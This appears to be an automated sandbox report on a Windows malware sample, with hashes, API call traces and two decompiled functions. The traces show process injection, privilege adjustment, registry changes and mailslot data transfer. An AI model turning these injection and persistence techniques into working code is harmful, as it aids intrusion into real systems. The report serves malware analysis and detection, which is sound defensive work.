    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:34C71A2B5584813A6BC94888E3669320
Total matches:156
Initial Analysis Report:Open
Initial sample Analysis ID:64003
Initial sample SHA 256:34CD6B92357754175CDC0BCA3CDA8C2AA439CDFBCC03683EE3B3D502E4C71151
Initial sample name:crypt_0001_1096b.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}


APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}


APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
